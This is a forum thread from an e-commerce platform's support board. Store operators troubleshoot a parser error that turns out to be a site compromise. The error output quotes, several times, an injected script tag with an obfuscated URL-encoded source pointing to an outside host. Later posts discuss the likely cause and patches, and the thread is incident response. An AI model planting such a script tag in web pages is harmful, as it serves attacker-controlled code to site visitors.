Parse Error - URGENT - Please help
Parse Error - URGENT - Please help
Hello all,
All in a sudden this morning, we are getting the following errors from our homepage. We did not make any customization this past couple of days.
It only happen for the Default.aspx . If I go directly to product detail page, the page loads fine.
Which file(s) should I look at the fix the error?
Server Error in '/' Application.
--------------------------------------------------------------------------------
Parser Error
Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.
Parser Error Message: Only Content controls are allowed directly in a content page that contains Content controls.
Source Error:
Line 65: </tr>
Line 66: </table>
Line 67: </asp:Content><script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>
Source File: /Admin/Default.aspx Line: 67
Many Thanks!
All in a sudden this morning, we are getting the following errors from our homepage. We did not make any customization this past couple of days.
It only happen for the Default.aspx . If I go directly to product detail page, the page loads fine.
Which file(s) should I look at the fix the error?
Server Error in '/' Application.
--------------------------------------------------------------------------------
Parser Error
Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.
Parser Error Message: Only Content controls are allowed directly in a content page that contains Content controls.
Source Error:
Line 65: </tr>
Line 66: </table>
Line 67: </asp:Content><script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>
Source File: /Admin/Default.aspx Line: 67
Many Thanks!
Re: Parse Error - URGENT - Please help
Did you injected some javascript in some scriptlet or page? Could you post your store URL.
Re: Parse Error - URGENT - Please help
Can you please post the full source of your Default.aspx file?
Re: Parse Error - URGENT - Please help
Sohaib,
Here you go the full source of the Default.aspx
<%@ Page Language="C#" MasterPageFile="~/Layouts/Scriptlet.master" Inherits="CommerceBuilder.Web.UI.AbleCommercePage" Title="xxx" %>
<%@ Register Assembly="CommerceBuilder.Web" Namespace="CommerceBuilder.Web.UI.WebControls.WebParts" TagPrefix="cb" %>
<asp:Content runat="server" ContentPlaceHolderID="PageContent">
<cb:ScriptletPart ID="HomePage" runat="server" Layout="Three Column" Content="Home Page" Sidebar="Standard Sidebar 1" Sidebar2="Standard Sidebar 2" Header="Standard Header" Footer="Standard Footer" Title="Home Page" AllowClose="False" AllowMinimize="false" />
</asp:Content>
Here you go the full source of the Default.aspx
<%@ Page Language="C#" MasterPageFile="~/Layouts/Scriptlet.master" Inherits="CommerceBuilder.Web.UI.AbleCommercePage" Title="xxx" %>
<%@ Register Assembly="CommerceBuilder.Web" Namespace="CommerceBuilder.Web.UI.WebControls.WebParts" TagPrefix="cb" %>
<asp:Content runat="server" ContentPlaceHolderID="PageContent">
<cb:ScriptletPart ID="HomePage" runat="server" Layout="Three Column" Content="Home Page" Sidebar="Standard Sidebar 1" Sidebar2="Standard Sidebar 2" Header="Standard Header" Footer="Standard Footer" Title="Home Page" AllowClose="False" AllowMinimize="false" />
</asp:Content>
Re: Parse Error - URGENT - Please help
Did you have any piece of javascript in your scriptlets that are used on default page or may be you have some conlib control that is trying to inject javascript.
Re: Parse Error - URGENT - Please help
mazhar,
There might be javascripts here and there, but we haven't been making any changes to the code this past couple of days. I would assume that they are OK for now.
It seems like all the 'Default.aspx" pages throughout the site is giving us this error. What are the files that every "Default.aspx" are sharing in Ablecommerce?
Thanks!
There might be javascripts here and there, but we haven't been making any changes to the code this past couple of days. I would assume that they are OK for now.
It seems like all the 'Default.aspx" pages throughout the site is giving us this error. What are the files that every "Default.aspx" are sharing in Ablecommerce?
Thanks!
Re: Parse Error - URGENT - Please help
And what is exact error that you get on this particular page? I suppose this source of your home page.nfortune wrote:Sohaib,
Here you go the full source of the Default.aspx
<%@ Page Language="C#" MasterPageFile="~/Layouts/Scriptlet.master" Inherits="CommerceBuilder.Web.UI.AbleCommercePage" Title="xxx" %>
<%@ Register Assembly="CommerceBuilder.Web" Namespace="CommerceBuilder.Web.UI.WebControls.WebParts" TagPrefix="cb" %>
<asp:Content runat="server" ContentPlaceHolderID="PageContent">
<cb:ScriptletPart ID="HomePage" runat="server" Layout="Three Column" Content="Home Page" Sidebar="Standard Sidebar 1" Sidebar2="Standard Sidebar 2" Header="Standard Header" Footer="Standard Footer" Title="Home Page" AllowClose="False" AllowMinimize="false" />
</asp:Content>
Re: Parse Error - URGENT - Please help
It appears that our server has been hacked! All the Default.aspx were injected with the offended javascript code!
Re: Parse Error - URGENT - Please help
I'd agree, given that the javascript call is to "lndex.net" and resolves to an IP in Beijing...
Nick Cole
http://www.ethofy.com
http://www.ethofy.com
Re: Parse Error - URGENT - Please help
This is scary.
Able Customer Since 1999 Currently Running on GOLD R12 SR1 and PCI Certified.
Re: Parse Error - URGENT - Please help
I just got a call from an AC7 customer with the exact same symptoms 

Joe Payne
AbleCommerce Custom Programming and Modules http://www.AbleMods.com/
AbleCommerce Hosting http://www.AbleModsHosting.com/
Precise Fishing and Hunting Time Tables http://www.Solunar.com
AbleCommerce Custom Programming and Modules http://www.AbleMods.com/
AbleCommerce Hosting http://www.AbleModsHosting.com/
Precise Fishing and Hunting Time Tables http://www.Solunar.com
Re: Parse Error - URGENT - Please help
Joe,
Can you tell me which AC build your customer is running on? We are running on a relatively old build, I'm just wondering if the latest security fixes from AC will fix the problem.
Thanks!
Can you tell me which AC build your customer is running on? We are running on a relatively old build, I'm just wondering if the latest security fixes from AC will fix the problem.
Thanks!
Re: Parse Error - URGENT - Please help
AC7 Final Build 10125 using DiscountASP.Net as the hosting provider.nfortune wrote:SolunarServices,
Can you tell me which AC build your customer is running on? We are running on a relatively old build, I'm just wondering if the latest security fixes from AC will fix the problem.
Thanks!
Joe Payne
AbleCommerce Custom Programming and Modules http://www.AbleMods.com/
AbleCommerce Hosting http://www.AbleModsHosting.com/
Precise Fishing and Hunting Time Tables http://www.Solunar.com
AbleCommerce Custom Programming and Modules http://www.AbleMods.com/
AbleCommerce Hosting http://www.AbleModsHosting.com/
Precise Fishing and Hunting Time Tables http://www.Solunar.com
Re: Parse Error - URGENT - Please help
Last November, we released an "Important Security Update" as part of Service Release 2. It includes changes that should prevent any SQL injection attacks.
http://help.ablecommerce.com/upgrades/A ... ce_7.0.htm
Since then, we have also released SR3 which is includes everything from SR1 and up.
http://help.ablecommerce.com/upgrades/a ... ease_3.htm
It's really important to keep your installs current...
http://help.ablecommerce.com/upgrades/A ... ce_7.0.htm
Since then, we have also released SR3 which is includes everything from SR1 and up.
http://help.ablecommerce.com/upgrades/a ... ease_3.htm
It's really important to keep your installs current...
Thank you for choosing AbleCommerce!
http://help.ablecommerce.com - product support
http://wiki.ablecommerce.com - developer support
http://help.ablecommerce.com - product support
http://wiki.ablecommerce.com - developer support
-
- Ensign (ENS)
- Posts: 6
- Joined: Thu Jun 12, 2008 4:07 pm
Re: Parse Error - URGENT - Please help
We have just experienced this same error and are restoring our site from backup. We have reviewed the database to confirm but this is not a SQL Injection attack. This is a file attack and the SQL has not been compromised.
This vulnerability was able to loop through every folder and subfolder in our store. It added the already mentioned script tag to every single .aspx page and completely replaced the text in all html pages.
We are restoring from backup currently and working to ensure all latest service releases are applied. We will post further if we continue to experience issues.
This vulnerability was able to loop through every folder and subfolder in our store. It added the already mentioned script tag to every single .aspx page and completely replaced the text in all html pages.
We are restoring from backup currently and working to ensure all latest service releases are applied. We will post further if we continue to experience issues.
Re: Parse Error - URGENT - Please help
FTP password was probably compromised.
Joe Payne
AbleCommerce Custom Programming and Modules http://www.AbleMods.com/
AbleCommerce Hosting http://www.AbleModsHosting.com/
Precise Fishing and Hunting Time Tables http://www.Solunar.com
AbleCommerce Custom Programming and Modules http://www.AbleMods.com/
AbleCommerce Hosting http://www.AbleModsHosting.com/
Precise Fishing and Hunting Time Tables http://www.Solunar.com
-
- Ensign (ENS)
- Posts: 6
- Joined: Thu Jun 12, 2008 4:07 pm
Re: Parse Error - URGENT - Please help
We were compromised again almost like clockwork exactly one week later from my original post. We changed our FTP username and password, applied all security updates and we still were compromised.SolunarServices wrote:FTP password was probably compromised.
Doing some research leads us to the conclusion that somehow the attacker is using the store API to re-write files that are not meant be re-written.
Without being able to see the details of the Scrtiplet and ScriptletType objects, I am guessing they are using the something like the EditScriplet.aspx module to do this. Viewing the source shows that parameters are sent through the querystring to modify content.
i.e. EditScriptlet.aspx?s=Category+Grid+Page+with+Basket+Options&t=Content
With this information exposed in this manner, it is conceivable a session could be hijacked and that the attacker could be using this funcationality to do some malicious things.
One other thing that points to a bug in AbleCommerce is that we run our own hosting servers servicing hundreds of customers. This is the only site that was compromised and one of the (if not) only site that has file re-writing features. I would think that if the attacker could get down to the level to write files through IIS or FTP, they would have targeted more than one specific site.
I think this is a security issue in the code that needs to be patched immediately. I am anticipating getting hacked again this friday.
Please understand, I am not trying to point fingers, I just want to be part of the solution. I think there is a major issue here and want to provide confidence to my customers.
Thank you.
Re: Parse Error - URGENT - Please help
An attack of that nature would show up in weblogs. Any clues there?
Looking for IP source is a good place to start - here's the netblock info for the injected script target:
Looking for IP source is a good place to start - here's the netblock info for the injected script target:
Code: Select all
lndex.net. A 219.152.120.182
inetnum: 219.151.128.0 - 219.153.255.255
netname: CHINANET-CQ
descr: CHINANET Chongqing province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
Nick Cole
http://www.ethofy.com
http://www.ethofy.com
- Logan Rhodehamel
- Developer
- Posts: 4116
- Joined: Wed Dec 10, 2003 5:26 pm
Re: Parse Error - URGENT - Please help
Any information from the weblog that can help identify the source of compromise would be immensely helpful. Could you send to me the weblog from the day of the compromise? If we can confirm this issue and discover the source, producing a patch would be an immediate priority.nickc wrote:An attack of that nature would show up in weblogs. Any clues there?
Looking for IP source is a good place to start - here's the netblock info for the injected script target:
Cheers,
Logan
.com
If I do not respond to an unsolicited private message, it's not because I'm ignoring you. It's because the answer to your question is valuable to others. Try the new topic button.
Logan

If I do not respond to an unsolicited private message, it's not because I'm ignoring you. It's because the answer to your question is valuable to others. Try the new topic button.
- Logan Rhodehamel
- Developer
- Posts: 4116
- Joined: Wed Dec 10, 2003 5:26 pm
Re: Parse Error - URGENT - Please help
Based on this I do not think it has to do with the scriptlet editor. From this snippet, it appears the script tag has been injected into the default.aspx file somehow.nfortune wrote:Source Error:
Line 65: </tr>
Line 66: </table>
Line 67: </asp:Content><script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>
In addition to weblogs, it would be helpful for us to have a copy of the compromised site files. That way I could locate where the injection is physically being placed. As much detail as I can possibly get will help me to track the issue. As of right now, I can't say for certain whether it is specific to AbleCommerce or not.
Anyone with this situation occuring may contact me via PM.
Cheers,
Logan
.com
If I do not respond to an unsolicited private message, it's not because I'm ignoring you. It's because the answer to your question is valuable to others. Try the new topic button.
Logan

If I do not respond to an unsolicited private message, it's not because I'm ignoring you. It's because the answer to your question is valuable to others. Try the new topic button.
-
- Ensign (ENS)
- Posts: 6
- Joined: Thu Jun 12, 2008 4:07 pm
Re: Parse Error - URGENT - Please help
We are reviewing our web logs to see if we can dig out some information and will send it as soon as we can find relevant information.
In our situation we host multiple sites and domains and this is the only compromise we have had. This particular store is very highly ranked in Google and my guess is the URL was found with a BotNet and identified for attack. There is an exploit out right now that is doing this which is occurring for others as well. There is a recent article on Experts Exchange detailing this as well but I am not sure the article has really posted an answer. This attack inserting Lndex.net appears fairly new and we are continuing to search for more information on how the exploit occurs.
In our situation we host multiple sites and domains and this is the only compromise we have had. This particular store is very highly ranked in Google and my guess is the URL was found with a BotNet and identified for attack. There is an exploit out right now that is doing this which is occurring for others as well. There is a recent article on Experts Exchange detailing this as well but I am not sure the article has really posted an answer. This attack inserting Lndex.net appears fairly new and we are continuing to search for more information on how the exploit occurs.
-
- Ensign (ENS)
- Posts: 6
- Joined: Thu Jun 12, 2008 4:07 pm
Re: Parse Error - URGENT - Please help
New finding, the URL in the script this time around translates to a url 51ofnet.net instead of lndex.net. Don't know if this helps, but it was different.
Thanks
Thanks
- Logan Rhodehamel
- Developer
- Posts: 4116
- Joined: Wed Dec 10, 2003 5:26 pm
Re: Parse Error - URGENT - Please help
I have removed some posts in this thread that were sensitive. The root cause is still being investigated.
Cheers,
Logan
.com
If I do not respond to an unsolicited private message, it's not because I'm ignoring you. It's because the answer to your question is valuable to others. Try the new topic button.
Logan

If I do not respond to an unsolicited private message, it's not because I'm ignoring you. It's because the answer to your question is valuable to others. Try the new topic button.